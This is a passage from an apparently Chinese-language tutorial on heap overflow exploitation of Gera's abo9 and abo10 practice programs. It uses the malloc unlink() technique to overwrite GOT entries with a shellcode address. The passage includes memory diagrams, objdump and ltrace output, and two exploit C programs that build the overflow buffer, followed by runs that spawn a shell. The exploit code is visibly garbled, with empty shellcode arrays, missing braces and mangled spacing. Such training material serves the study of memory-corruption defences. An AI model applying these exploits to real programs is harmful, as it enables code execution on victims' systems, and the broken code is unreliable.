    这样,当试图free()释放第二个内存块(chunk)的时候,它的prev_size域被读到,而且前一个内存块的指针在这里计算.在这里是这样计算的  0x08049780-0x41414141=0xc6c3563f.函数chunk_free()试图访问0xc6c3563f,当然它将得到段错误。攻击者的目的是通过在第二个内存块的prev_size域添入负数(一个正数也是可能的,但是一个很小的数将包含至少一个NULL字节,这种变形在技术上将难以完成)来伪造一个chunk。基于用这个伪造的内存块替代了真正的第二个内存块,unlink()过程将交换这个伪造的chunk的bk和fd(这是攻击者可以控制的),从而重写内存中的任一地址。
当程序被操作系统调入内存运行, 其相对应的进程在内存中的影像如下图所示.
                   |                                      |
                   +--------------------------------------+ <---0x08049678
                  /|          prev_size 域                |/
                 / +--------------------------------------+ >第一个内存块头部
                /  |             size 域                  |/
               /   +--------------------------------------+ <---0x08049680
  第一个内存块<    |         256 bytes of data            | |
               /   |              AAAAAAAA                | |
                /  |              AAAAAAAA                | |块溢出方向      
                 / |              AAAAAAAA                | |
                  /|              AAAAAAAA                |/|/
                  +--------------------------------------+  <----0x08049780
                 / |             0xFFFFFFFC               |  /
                /  +--------------------------------------+   >第二个内存块头部
               /   |             0xFFFFFFFC               |/ /
              /    +--------------------------------------+ /<----0x08049788
             /     |              AAAAAAAA                |  /
第二个内存块<      +--------------------------------------+   >伪造块
             /     |         free() addr. in GOT          |  /
              /    +--------------------------------------+ /
               /   |            shellcode addr.           |/
                /  +--------------------------------------+
                 / |                                      |

    在此简单的解释一下。当free()释放第二个内存块是,malloc将检查相邻的两个块是否已经被释放。它首先检查前一个chunk。如果这个块已经被释放,一个叫PREV_INUSE的标志(flag)将被置为0. 这个标志在当前被释放的块的size区(size区最低有效位).如果这个标志没有被赋值,那么当前的块将被释放.前一个内存块的位置则并不知道.指向当前块的指针和前一个块的大小将用来计算它.
攻击者在第二个内存块的size区赋一个0xfffffffc(-4)的值,因为最低有效位必须为0(其他的负数也适用).prev_size域的值现在再次被赋为0xfffffffc(-4),且现在前一个块的指针应该这样计算: 0x08049780-(0xfffffffc)=0x08049784(并非0x08049786).攻击者将会把他伪造的块放在0x08049784.伪造的块头的两个域(prev_size和size)在此并不需要注意.只需注意当fd和bk交换时攻击者可以覆盖内存中的任意一个地址.他可能会选择把GOT中free()函数的地址给fd,把shellcode的地址给bk.现在来看unlink(),shellcode现在在GOT中的free()的地址.当执行第二个free()时(本例中),程序会搜索GOT中的地址,但是它指向的却是shellcode.所以,一个shellcode就代替了free()而执行了.

user@ CoreLabs:~/ gera$ objdump - R ./ abo9

            ./ abo9:           file format elf32- i386

            OFFSET       TYPE                             VALUE
            08049658 R_ 386_ GLOB_ DAT         __ gmon_ start__
            08049640 R_ 386_ JUMP_ SLOT       __ register_ frame_ info
            08049644 R_ 386_ JUMP_ SLOT       malloc
            08049648 R_ 386_ JUMP_ SLOT       __ deregister_ frame_ info
            0804964c R_ 386_ JUMP_ SLOT       __ libc_ start_ main
            08049650 R_ 386_ JUMP_ SLOT       free
            08049654 R_ 386_ JUMP_ SLOT       strcpy

            user@ CoreLabs:~/ gera$

            user@ CoreLabs:~/ gera$ gcc exp9. c - o exp9
            user@ CoreLabs:~/ gera$ ./ exp9
            Shellcode address in stack is: 0xbfffffc7
            free() address in GOT is:             0x8049650
            sh- 2.05$

** exp9. c
** Coded by CoreSecurity-info@core-sec.com

# include <string.h>
# include <unistd.h>
# include <stdio.h>

# define JUNK                       0xcafebabe
# define NEGATIVE_SIZE              0xfffffffc

# define OBJDUMP                    "/usr/bin/objdump"
# define VICTIM                     "/home/user/gera/abo9"
# define GREP                       "/bin/grep"

/* 10 bytes jump and 24 bytes shellcode */
char shellcode[] =

int main() {

                char * p;
                char evil_buffer[276+1];                   /* 256 + 20 = 276 */
                char temp_buffer[64];
                char * env[3]={shellcode,NULL;}
                int shellcode_addr=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo9");
                int free_addr;
                FILE * f;

                printf("Shellcode address in stack is: 0x% xn",shellcode_addr);

                sprintf(temp_buffer,"% s - R % s | % s free",OBJDUMP,VICTIM,GREP);
                f = popen(temp_buffer,"r");
                if(fscanf(f,"% x",&free_addr)!=1){
                                printf("Error: Cannot find free address in GOT!n");

                printf("free() address in GOT is:             0x% xn",free_addr);


                memset(p,'A',(256));                        /* padding */
                p +=256;

                *((void **)p)=(void *)(NEGATIVE_SIZE);      /* prev_size field of second chunk*/
                p +=4;

                *((void  **)p)=(void  *) ( NEGATIVE_SIZE);  /*  size field of second chunk and prev_size filed of fake chunk     */
                p += 4;

                *(( void **) p) = ( void *) ( JUNK);        /* size field of fake chunk*/
                p += 4;

                *((void  **)p) = (void  *) (free_addr-12);  /* fd field of second chunk */
                p += 4;

                *((void  **)p)=( void *)(shellcode_addr);   /* bk field of second chunk */
                p += 4;

                * p ='0';


/* abo10. c                                                     *
* specially crafted to feed your brain by gera@ core- sdi. com */

/* modified by CoreSecurity */

/* Deja-vu                 */

char buf[256];

int main( int argv, char ** argc) {
                char * pbuf=(char*) malloc(256);

//             gets(buf);

                   |                                      |
                   +--------------------------------------+ <---0x08049720
                  /|         256 bytes of data            |
                 / |              AAAAAAAA                |  |
                /  |              AAAAAAAA                |  |
               /   |              AAAAAAAA                |  |缓存溢出方向      
     Buf[256]  /   |              AAAAAAAA                |  |
                /  |              AAAAAAAA                |  |
                 / |              AAAAAAAA                |  |
                  /|              AAAAAAAA                | /|/
                   +--------------------------------------+  <----0x08049820
                 / |             0xFFFFFFFC               |  /
                /  +--------------------------------------+   >块头部
               /   |             0xFFFFFFFC               |/ /
              /    +--------------------------------------+ /<----0x08049728
             /     |              AAAAAAAA                |  /
      pbuf块<      +--------------------------------------+   >伪造块
             /     |         dereg. addr. in GOT          |  /
              /    +--------------------------------------+ /
               /   |            shellcode addr.           |/
                /  +--------------------------------------+
                 / |                                      |

user@ CoreLabs:~/ gera$ ltrace ./ abo10
__ libc_ start_ main( 0x08048454,       1,       0xbffffa34,       0x080482e0,       0x080484cc
< unfinished ...>
__ register_ frame_ info( 0x080494fc,       0x08049600,       0xbffff9d8,       0x4004f138,
0x4012ba58) = 0x4012c740
malloc( 256)                                                                               = 0x08049728
strcpy( 0x08049620, NULL < unfinished ...>
--- SIGSEGV ( Segmentation fault) ---
+++ killed by SIGSEGV +++
user@ CoreLabs:~/ gera$ objdump - R ./ abo10

./ abo10:           file format elf32- i386

OFFSET       TYPE                             VALUE
080495fc R_ 386_ GLOB_ DAT         __ gmon_ start__
080495e4 R_ 386_ JUMP_ SLOT       __ register_ frame_ info
080495e8 R_ 386_ JUMP_ SLOT       malloc
080495ec R_ 386_ JUMP_ SLOT       __ deregister_ frame_ info
080495f0 R_ 386_ JUMP_ SLOT       __ libc_ start_ main
080495f4 R_ 386_ JUMP_ SLOT       free
080495f8 R_ 386_ JUMP_ SLOT       strcpy

user@ CoreLabs:~/ gera$

user@ CoreLabs:~/ gera$ gcc exp10. c - o exp10
user@ CoreLabs:~/ gera$ ./ exp10
Shellcode address in stack is: 0xbfffffc6
__ deregister address in GOT is:             0x80495ec
sh- 2.05#

** exp10. c
** Coded by CoreSecurity-info@core-sec.com

# include <string.h>
# include <unistd.h>
# include <stdio.h>

# define JUNK                       0xcafebabe
# define NEGATIVE_ SIZE             0xfffffffc

# define OBJDUMP                    "/usr/bin/objdump"
# define VICTIM                     "/home/user/gera/abo10"
# define GREP                       "/bin/grep"

/* 10 bytes jump and 24 bytes shellcode */
char shellcode[] =

int main() {

                char * p;
                char evil_buffer[276+1];                   /* 256 + 20 = 276 */
                char temp_buffer[64];
                char * env[3]={shellcode,NULL;}
                int shellcode_addr=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo10");
                int dreg_addr;
                FILE * f;

                printf("Shellcode address in stack is: 0x% xn", shellcode_addr);

                sprintf(temp_buffer,"% s   - R   % s   |   % s   deregister",OBJDUMP,VICTIM,GREP);
                if(fscanf(f,"% x",& dreg_addr) != 1){
                                printf("Error: Cannot find __deregister address in GOT!/n");

                printf("_deregister address in GOT is: 0x% xn", dreg_addr);

                p = evil_buffer;

                memset(p,'A',(256));                                  /* padding */
                p += 256;

                *((void **)p)=(void *)(NEGATIVE_SIZE);               /* prev_size field of second chunk*/
                p += 4;

                *((void **)p)=(void *)(NEGATIVE_SIZE);               /* size field of second chunk and
                                                                                                                      prev_size  filed of fake chunk     */
                p += 4;

                *((void **)p)=( void *)(JUNK);                      /* size field of fake chunk*/
                p += 4;

                *((void **) p)=(void *)(dreg_addr-12);              /* fd field of second chunk */
                p += 4;

                *((void **)p)=(void *)(shellcode_addr);             /* bk field of second chunk */
                p += 4;

                * p = '0';




            1. Gera,《Insecure Programming by Example》
            2. Aleph One,《Smashing The Stack For Fun And Profit》
            3. Murat,《Buffer Overflows Demystified》
            4. Juan M. Bello Rivas,《Overwriting the . dtors section》
            5. anonymous,《Once upon a free()》
            6. Michel 《MaXX》 Kaempf,《Vudo malloc tricks》




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